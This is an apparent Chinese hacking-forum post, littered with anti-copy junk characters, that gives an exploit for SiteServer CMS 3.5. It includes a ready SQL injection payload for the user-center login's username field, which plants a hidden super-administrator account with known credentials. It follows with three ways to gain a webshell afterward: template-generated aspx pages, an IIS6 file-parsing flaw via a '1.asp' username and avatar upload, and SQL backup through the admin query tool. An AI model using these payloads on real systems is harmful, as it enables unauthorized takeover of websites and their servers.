经测试秒杀最新的3.5版
/ e" a/ ~! b& o% Q$ M7 Estieserver官网:www.siteserver.cn) n: }3 K3 ~. p
EXP:* U& k# S% {+ R0 H' U
直接访问UserCenter/login.aspx6 p" T+ t7 K- h
用户名处输入:0 y$ K6 B! F1 `1 T! [9 x
6 `8 u" |9 [7 ~' ]8 A
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 G1 N& V& b* ^" |6 M% V# e
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。' \0 |: j- Z5 y2 G; O3 h
之后再访问后台SiteServer/login.aspx用插入的用户登陆
( M, n3 N- i- a* T8 o W4 V+ f后台拿webshell的三种方法:% V- j* G2 z+ E* T6 p6 F' `. O+ u
一、
" q- Y6 [, _! b5 C7 l3 g站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx1 U! [+ W% @; W* f; r
二、
3 O9 I* h8 u6 u成员权限-》添加用户-》用户名为:1.asp
8 d/ g7 i2 g! V5 d( s# ahttp://127.0.0.1/usercenter/
6 B, Z6 _5 `$ @* j- E4 E9 f8 ?$ Q2 |用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
! g7 ^7 h, P. _8 m* O: y(ps:后台添加用户时不会验证是否含有非法字符)
O- f0 ~4 Q4 c5 _3 Z三、& U0 W+ J5 i6 z$ k; t: o/ \' i
系统工具-》实用工具-》机器参数查看# }1 B) _, w& k: Z9 U
可以看到数据库类型、名称,WEB路径
, `% y* m: h% {% E2 C系统工具-》数据库工具-》SQL语句查询
, ^+ ]1 o2 Y7 Q9 w, ?这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |